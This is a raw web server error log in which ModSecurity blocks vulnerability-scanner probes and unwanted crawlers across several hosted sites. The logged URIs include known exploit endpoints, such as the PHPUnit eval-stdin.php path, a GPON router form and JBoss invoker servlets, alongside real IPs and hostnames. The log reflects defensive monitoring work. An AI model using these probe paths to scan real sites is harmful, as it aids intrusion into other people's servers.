[Tue May 26 15:12:53.319116 2026] [security2:error] [pid 686593:tid 686757] [client 23.94.40.119:35732] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/invoker/JMXInvokerServlet/"] [unique_id "ahVrHeilgkZcvx0_tl-6zgAAAKc"]
[Tue May 26 15:12:53.725303 2026] [security2:error] [pid 686593:tid 686803] [client 104.43.242.179:48129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/t3s.php"] [unique_id "ahVrHeilgkZcvx0_tl-64AAAANU"]
[Tue May 26 15:12:53.725415 2026] [security2:error] [pid 686593:tid 686803] [client 104.43.242.179:48129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/t3s.php"] [unique_id "ahVrHeilgkZcvx0_tl-64AAAANU"]
[Tue May 26 15:12:54.235337 2026] [security2:error] [pid 686593:tid 686805] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrHeilgkZcvx0_tl-64wAAANc"]
[Tue May 26 15:12:54.979759 2026] [security2:error] [pid 686593:tid 686835] [client 23.94.40.119:35836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/maint/modules/home/index.php"] [unique_id "ahVrHuilgkZcvx0_tl-7DwAAAPU"]
[Tue May 26 15:12:55.523638 2026] [security2:error] [pid 686593:tid 686819] [client 23.94.40.119:35936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/3EFyJOuRJVBRCPpWIyyP1aPQDLe.php%5Cx0A"] [unique_id "ahVrH-ilgkZcvx0_tl-7IgAAAOU"]
[Tue May 26 15:12:55.964911 2026] [security2:error] [pid 686593:tid 686846] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrH-ilgkZcvx0_tl-7JwAAAQA"]
[Tue May 26 15:12:56.895601 2026] [security2:error] [pid 686593:tid 686804] [client 23.94.40.119:36030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/clients/editclient.php"] [unique_id "ahVrIOilgkZcvx0_tl-7UwAAANY"]
[Tue May 26 15:12:57.163331 2026] [security2:error] [pid 686593:tid 686796] [client 23.94.40.119:36064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/logos_clients/3EFyJOUaRUPmtClRlu4YkalfxJR.php"] [unique_id "ahVrIeilgkZcvx0_tl-7ZAAAAM4"]
[Tue May 26 15:12:57.224756 2026] [security2:error] [pid 686593:tid 686830] [client 114.119.138.194:34743] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kexcouriers.com"] [uri "/service.html"] [unique_id "ahVrIeilgkZcvx0_tl-7agAAAPA"], referer: https://kexcouriers.com/service.html
[Tue May 26 15:12:58.408856 2026] [security2:error] [pid 686593:tid 686780] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrIeilgkZcvx0_tl-7gwAAAL4"]
[Tue May 26 15:12:58.904534 2026] [security2:error] [pid 686593:tid 686817] [client 14.165.160.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrIuilgkZcvx0_tl-7jgAAAOM"]
[Tue May 26 15:13:00.645863 2026] [security2:error] [pid 686593:tid 686824] [client 85.121.240.156:43718] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrJOilgkZcvx0_tl-71wAAAOo"]
[Tue May 26 15:13:00.701312 2026] [security2:error] [pid 686593:tid 686747] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrJOilgkZcvx0_tl-70wAAAJ0"]
[Tue May 26 15:13:02.748297 2026] [security2:error] [pid 686593:tid 686832] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrJuilgkZcvx0_tl-8CQAAAPI"]
[Tue May 26 15:13:03.133739 2026] [security2:error] [pid 686593:tid 686846] [client 23.94.40.119:47780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVrJ-ilgkZcvx0_tl-8JAAAAQA"]
[Tue May 26 15:13:03.556457 2026] [security2:error] [pid 686593:tid 686748] [client 23.94.40.119:47830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrJ-ilgkZcvx0_tl-8LgAAAJ4"]
[Tue May 26 15:13:03.564840 2026] [security2:error] [pid 686593:tid 686744] [client 216.244.66.241:41076] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVrJ-ilgkZcvx0_tl-8LwAAAJo"]
[Tue May 26 15:13:03.565003 2026] [security2:error] [pid 686593:tid 686744] [client 216.244.66.241:41076] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVrJ-ilgkZcvx0_tl-8LwAAAJo"]
[Tue May 26 15:13:03.709970 2026] [security2:error] [pid 686593:tid 686736] [client 23.94.40.119:47838] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/GponForm/diag_Form"] [unique_id "ahVrJ-ilgkZcvx0_tl-8NgAAAJI"]
[Tue May 26 15:13:03.836016 2026] [security2:error] [pid 686593:tid 686776] [client 23.94.40.119:47852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/nagiosql/admin/logbook.php"] [unique_id "ahVrJ-ilgkZcvx0_tl-8OgAAALo"]
[Tue May 26 15:13:04.016829 2026] [lsapi:warn] [pid 686593:tid 686727] [client 153.75.250.146:21214] [host www.armourin.srsglobalsoft.com] Backend log: WordPress database error Incorrect key file for table './srsglzts_wp57454/wp4i_options.MYI'; try to repair it for query SELECT option_name, option_value FROM wp4i_options WHERE option_name IN ('_transient_timeout_jetpack_autoloader_plugin_paths') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Shutdown_Handler->__invoke, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Plugins_Handler->cache_plugins, set_transient, wp_prime_option_caches\n
[Tue May 26 15:13:04.018110 2026] [lsapi:warn] [pid 686593:tid 686727] [client 153.75.250.146:21214] [host www.armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782380584', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 15:13:04.019549 2026] [lsapi:warn] [pid 686593:tid 686727] [client 153.75.250.146:21214] [host www.armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/as
[Tue May 26 15:13:04.025499 2026] [security2:error] [pid 686593:tid 686753] [client 23.94.40.119:47862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/vendor/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVrKOilgkZcvx0_tl-8QwAAAKM"]
[Tue May 26 15:13:04.031544 2026] [security2:error] [pid 686593:tid 686810] [client 23.94.40.119:47874] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/GponForm/diag_Form"] [unique_id "ahVrKOilgkZcvx0_tl-8RAAAANw"]
[Tue May 26 15:13:04.428285 2026] [security2:error] [pid 686593:tid 686825] [client 23.94.40.119:47890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrKOilgkZcvx0_tl-8TgAAAOs"]
[Tue May 26 15:13:04.428440 2026] [security2:error] [pid 686593:tid 686825] [client 23.94.40.119:47890] ModSecurity: Warning. Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "409"] [hostname "webmail.pronumbers.com.au"] [uri "/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVrKOilgkZcvx0_tl-8TgAAAOs"]
[Tue May 26 15:13:04.428856 2026] [security2:error] [pid 686593:tid 686823] [client 23.94.40.119:47888] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/system/sharedir.php"] [unique_id "ahVrKOilgkZcvx0_tl-8UAAAAOk"]
[Tue May 26 15:13:04.429027 2026] [security2:error] [pid 686593:tid 686777] [client 23.94.40.119:47886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/nagiosql/admin/menuaccess.php"] [unique_id "ahVrKOilgkZcvx0_tl-8TwAAALs"]
[Tue May 26 15:13:04.487401 2026] [security2:error] [pid 686593:tid 686766] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrKOilgkZcvx0_tl-8QgAAALA"]
[Tue May 26 15:13:04.534701 2026] [security2:error] [pid 686593:tid 686817] [client 153.75.250.146:21214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.armourin.srsglobalsoft.com"] [uri "/wp-content/plugins/dropbox-folder-share/HynoTech/UsosGenerales/js/editor-view.php"] [unique_id "ahVrKOilgkZcvx0_tl-8UQAAAOM"]
[Tue May 26 15:13:04.650503 2026] [security2:error] [pid 686593:tid 686778] [client 23.94.40.119:47894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/modules/attributewizardpro/file_upload.php"] [unique_id "ahVrKOilgkZcvx0_tl-8VQAAALw"]
[Tue May 26 15:13:05.632575 2026] [security2:error] [pid 686593:tid 686726] [client 216.244.66.241:41062] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVrKeilgkZcvx0_tl-8eAAAAIg"]
[Tue May 26 15:13:05.632706 2026] [security2:error] [pid 686593:tid 686726] [client 216.244.66.241:41062] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVrKeilgkZcvx0_tl-8eAAAAIg"]
[Tue May 26 15:13:05.715901 2026] [security2:error] [pid 686593:tid 686731] [client 23.94.40.119:47896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVrKeilgkZcvx0_tl-8hwAAAI0"]
[Tue May 26 15:13:05.815448 2026] [security2:error] [pid 686593:tid 686781] [client 23.94.40.119:47908] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/photo-gallery/api/album/tree_lists/"] [unique_id "ahVrKeilgkZcvx0_tl-8iwAAAL8"]
[Tue May 26 15:13:05.934165 2026] [security2:error] [pid 686593:tid 686812] [client 23.94.40.119:47926] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/php/change_config.php"] [unique_id "ahVrKeilgkZcvx0_tl-8kQAAAN4"]
